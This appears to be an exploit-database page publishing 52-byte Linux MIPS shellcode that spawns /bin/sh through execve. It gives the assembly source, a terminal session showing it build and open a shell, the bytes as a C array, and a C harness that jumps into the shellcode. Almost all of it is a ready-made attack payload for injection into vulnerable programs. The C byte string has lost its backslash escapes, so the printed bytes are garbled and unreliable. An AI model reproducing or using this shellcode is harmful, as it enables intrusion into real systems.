[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 52 byte Linux MIPS execve
# Published : 2011-10-07
# Author :
# Previous Title : MIPS Linux XOR Shellcode Encoder (60 Bytes)
# Next Title : 返回列表
#include <stdio.h>
/*
entropy [at] phiral.net
52 byte linux mips shellcode
oh werd
entropy@phiral.mips {~/encode/1/2} cat s.s
.section .text
.globl __start
.set noreorder
__start:
li $a2, 0x666
p: bltzal $a2, p
slti $a2, $zero, -1
addu $sp, $sp, -32
addu $a0, $ra, 4097
addu $a0, $a0, -4065
sw $a0, -24($sp)
sw $zero, -20($sp)
addu $a1, $sp, -24
li $v0, 4011
syscall 0x40404
sc:
.byte 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
entropy@phiral.mips {~/encode/1/2} as s.s -o s.o
entropy@phiral.mips {~/encode/1/2} ld s.o -o s
entropy@phiral.mips {~/encode/1/2} ./s
$ exit
*/
char sc[] = {
"x24x06x06x66" /* li a2,1638 */
"x04xd0xffxff" /* bltzal a2,4100b4 <p> */
"x28x06xffxff" /* slti a2,zero,-1 */
"x27xbdxffxe0" /* addiu sp,sp,-32 */
"x27xe4x10x01" /* addiu a0,ra,4097 */
"x24x84xf0x1f" /* addiu a0,a0,-4065 */
"xafxa4xffxe8" /* sw a0,-24(sp) */
"xafxa0xffxec" /* sw zero,-20(sp) */
"x27xa5xffxe8" /* addiu a1,sp,-24 */
"x24x02x0fxab" /* li v0,4011 */
"x01x01x01x0c" /* syscall 0x40404 */
"/bin/sh" /* sltiu v0,k1,26990 */
/* sltiu s3,k1,26624 */
};
void
main(void)
{
void (*s)(void);
printf("sc size %dn", sizeof(sc));
s = sc;
s();
}